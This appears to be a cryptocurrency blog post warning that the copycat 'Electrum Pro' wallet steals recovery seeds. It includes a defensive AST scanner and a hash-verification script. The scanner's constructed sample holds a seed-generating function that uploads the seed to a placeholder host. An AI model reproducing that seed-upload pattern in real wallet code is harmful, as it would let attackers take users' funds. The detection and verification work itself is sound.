Warning: Electrum Pro Scam Wallet Stealing Users' Cryptocurrency

in #scam, 6 years ago

Whether markets go up or down, there always seems to be one sector making money regardless: scammers. Just when you think we've seen everything scammers can throw at us, from ICO exit scams to lending coins and Ponzi schemes swindling willing investors, unwilling investors had been fairly safe, until now.

Popular bitcoin wallet service Electrum has released evidence demonstrating that copycat client “Electrum Pro” is “bitcoin-stealing malware.”

[Image: Electrum wallet homepage screenshot]

About Electrum

First launched in 2011, Electrum has long been one of bitcoin’s most popular wallet clients, and many users trust the wallet for its proven security, ease-of-use, and its support for advanced features like multisig authentication and compatibility with hardware wallets like Ledger and Trezor.

The brand has been a staple, synonymous with security, which is probably why copycats targeted it as the centre of a wallet scam. Recently, a new wallet going by a similar name, Electrum Pro, popped up at the domain electrum.com, clearly attempting to divert users from the official website at electrum.org.

The team behind Electrum now says Electrum Pro is malware meant to steal bitcoins. To make things worse, Electrum Pro has been bidding on brand terms in AdWords and shows above the legitimate Electrum in Google search results because of Google Ads, a fact that will clearly trip up many users.

[Screenshot: Google search results showing the Electrum Pro ad above the legitimate Electrum, taken 2018-05-09]

This also goes to show why cryptocurrency projects need to purchase all the domains available to them (.org, .com, .io and more); it's a small price to pay to make sure your customers and potential customers are led to the correct place.

Secondly, it also makes a big case for Google's decision to ban cryptocurrency ads from its AdWords and display network platform.

Response from Electrum

The team behind Electrum has given a detailed explanation on GitHub which anyone can follow to find the rogue lines of code in Electrum Pro that steal recovery seeds and send them to the attackers.

A recovery seed is a feature of most modern wallets: a set of random words is generated that can be used to recover the wallet if the keys are lost. Once the seed is transmitted, the scammers can use it to recover the user's wallet along with all its funds.

The Proof

The proof given is a step-by-step guide to decompiling the Python-based binary. It claims that within the binary, at the point where the seed is created, an additional step exists which uploads the seed to electrum(dot)com. The official website for the Electrum wallet is electrum.org, which we can be sure of due to its link on the external site bitcoin.org.

In order to verify the claims, I followed the steps outlined. To begin, I downloaded the zip file for Electrum Pro and verified that the hash of my file matched the one referenced in the proof:

Mine: f497d2681dc00a7470fef7bcef8228964a2412889cd70b098cb8985aa1573e99
Theirs: f497d2681dc00a7470fef7bcef8228964a2412889cd70b098cb8985aa1573e99

The files are identical, meaning I should see the same data further on as stated in the proof, so long as it is true.

Following the steps, I extracted the zip file (in my case with unzip, rather than 7za), then extracted the pyc files from the .exe inside the zip. Once the pyc files were extracted, I decompiled them using uncompyle6 and found the following Python 3 code:

The above code is the same as what is shown in the proof provided by @ElectrumWallet, and as such I can externally verify that Electrum Pro contains the lines referenced in the proof.
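Once you have decompiled source in hand, the question the proof answers is a mechanical one: does the function that creates the seed also send anything over the network? The script below is an added example written for this post (it is not Electrum's tooling and not the code from the proof) that walks a Python AST and flags any function which both handles a seed and calls into a network module. The indicator lists and the sample source it scans are constructed for the demo, and the domains in the sample are placeholders, not the real one.

```python
"""Audit decompiled wallet source for seed-handling functions that also make
network calls. Added example for this post, not Electrum's own tooling."""
import ast

# Assumed indicator lists: modules and call names that mean outbound traffic.
NETWORK_MODULES = {"urllib", "requests", "socket", "http", "httplib"}
NETWORK_CALLS = {"urlopen", "Request", "post", "get", "put", "connect", "send", "sendall"}
SEED_WORDS = ("seed", "mnemonic")

# Constructed stand-in for decompiled wallet code. make_seed() has the extra
# upload step the proof describes; the domains are placeholders, not real ones.
SAMPLE_SOURCE = '''
import os
from urllib.request import urlopen, Request

def make_seed(nbits=132):
    entropy = os.urandom(nbits // 8)
    seed = encode_words(entropy)
    req = Request("https://seed-collector.invalid/api", data=seed.encode())
    urlopen(req)  # the rogue step: the seed leaves the machine
    return seed

def check_update():
    return urlopen("https://updates.invalid/version").read()

def encode_words(entropy):
    return " ".join(format(b, "02x") for b in entropy)
'''


def _root_name(node):
    """Reduce urllib.request.urlopen / requests.post / urlopen to its leftmost name."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else ""


def _callee(node):
    """Name of the function a Call targets: 'post' for requests.post(...)."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return ""


def _network_names(tree):
    """Names bound by importing a network module, e.g. {'urlopen', 'Request', 'requests'}."""
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in NETWORK_MODULES:
                names.update(a.asname or a.name for a in node.names)
        elif isinstance(node, ast.Import):
            for a in node.names:
                if a.name.split(".")[0] in NETWORK_MODULES:
                    names.add((a.asname or a.name).split(".")[0])
    return names


def _touches_seed(func):
    """True if the function name, any identifier, argument or attribute mentions a seed."""
    names = {func.name}
    for n in ast.walk(func):
        if isinstance(n, ast.Name):
            names.add(n.id)
        elif isinstance(n, ast.Attribute):
            names.add(n.attr)
        elif isinstance(n, ast.arg):
            names.add(n.arg)
    return any(w in name.lower() for name in names for w in SEED_WORDS)


def scan_source(source):
    """Return [{'function', 'line', 'calls'}] for seed functions that talk to the network."""
    tree = ast.parse(source)
    net_names = _network_names(tree) | NETWORK_MODULES
    findings = []
    for func in (n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)):
        if not _touches_seed(func):
            continue
        calls = [(_callee(n), n.lineno) for n in ast.walk(func)
                 if isinstance(n, ast.Call)
                 and _callee(n) in NETWORK_CALLS
                 and _root_name(n.func) in net_names]
        if calls:
            findings.append({"function": func.name, "line": func.lineno, "calls": calls})
    return findings


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"{f['function']} (line {f['line']}): network calls {f['calls']}")
```

Run against the sample, only make_seed is reported; check_update also uses the network but never touches a seed, and encode_words touches the seed but never the network. A legitimate wallet's seed code should produce no findings at all, which is exactly the property the Electrum proof shows Electrum Pro violates.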

[Image: verified proof, decompiled code matching the lines in Electrum's proof]

What does this mean?

It is now proven that Electrum Pro steals wallet seeds on creation, meaning that any coins stored in a wallet created with this tool are accessible to anyone with access to electrum(dot)com. If you mistakenly used this wallet, you should move your coins to a secure wallet as soon as possible.

Not the first scam

This is not the first time a fraudulent Electrum wallet has appeared. Scammers have registered similar domains before, hosting an infected version of the software for users to download. However, this is the first time scammers have been able to use the electrum.com domain.

The website looks reasonably professional, and it is hard to identify it as a fraud unless you have been to the original site before. If you visit the scammer's .com domain with MetaMask installed in your browser you should receive a scam alert, but that does not apply to every visitor, so we need to spread the word on this scam.

The website’s WHOIS information is not public, so information about the domain’s legal owner cannot be discovered.

Recommendations from Electrum

To combat these problems, Electrum recommends users check the GPG signatures before they start using the wallet. In addition to GPG signatures, Electrum is working towards verifying the wallet using Windows' native verification scheme. Also, at some point, they intend to have the official app on the Mac App Store to avoid similar scams.

If you have recently installed Electrum, make sure you installed the official version from electrum.org and not from any other source. If you mistakenly used the malicious wallet, move your bitcoins immediately and remove the application from your computer.

How to avoid malware like this in future

When installing wallets, verify at every step that what you're doing is correct. Make sure that URLs are correct, confirm those URLs with external sources if possible, and always verify hashes and signatures. In Electrum's case, all official binaries are signed with ThomasV's PGP key.

To verify other wallets, you should be able to use the keys and hashes provided on the wallet's home page. This may seem like a lot of work, but how much is the security of your coins worth to you?
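The hash comparison I did above against the proof, and the "always verify hashes" advice here, come down to the same routine: hash the file you actually downloaded and compare it with the value the project published. The script below is an added example written for this post (not Electrum's code or any wallet's official tooling) that streams a file through SHA-256, parses a sha256sum-style list of published hashes, and compares in constant time. The installer bytes and the sums text in the demo are constructed, and the filename wallet-setup.exe is a placeholder.

```python
"""Check a downloaded wallet installer against the hash the project published
before running it. Added example for this post, not any wallet's own tooling."""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large installers need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sums(text):
    """Parse 'hash  filename' lines as produced by sha256sum into {filename: hash}.

    Blank lines and '#' comments are skipped; a leading '*' on the filename
    (sha256sum's binary-mode marker) is dropped.
    """
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        sums[name] = digest.lower()
    return sums


def verify_download(path, sums_text):
    """Return (ok, reason). Only the entry matching this filename is considered."""
    expected = parse_sums(sums_text).get(os.path.basename(path))
    if expected is None:
        return False, "no published hash for this filename"
    actual = sha256_file(path)
    # compare_digest avoids leaking where the mismatch occurs via timing.
    if not hmac.compare_digest(actual, expected):
        return False, f"hash mismatch: got {actual}, expected {expected}"
    return True, "hash matches the published value"


def demo():
    """Constructed demo: a fake installer checked against a matching and a wrong sums file."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "wallet-setup.exe")  # placeholder filename
        with open(path, "wb") as fh:
            fh.write(b"constructed installer bytes, not a real binary\n")
        good_sums = f"{sha256_file(path)}  wallet-setup.exe\n"
        bad_sums = "0" * 64 + "  wallet-setup.exe\n"
        return verify_download(path, good_sums)[0], verify_download(path, bad_sums)[0]


if __name__ == "__main__":
    ok, wrong = demo()
    print(f"matching hash accepted: {ok}; wrong hash rejected: {not wrong}")
```

A matching hash only tells you the file is the one the publisher listed; it says nothing about who the publisher is if the hash list came from the same place as the download. That is why the post's advice pairs it with a signature: for Electrum that means importing ThomasV's key and running gpg --verify on the detached .asc signature that ships next to each binary, which ties the hash list to a key you obtained independently of the website.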

To use the real Electrum wallet, visit https://electrum.org/#home

Have your say

Which wallets do you use to store your cryptocurrency? Have you heard of Electrum? Are you an Electrum user? What do you think of this scam? I'd like to hear your thoughts, and please resteem this post to spread the news on this scam.

Let's connect

For more cryptocurrency news, or to hear my opinion on what's happening in the market, feel free to follow me @chekohler.

Resteem, upvote, follow

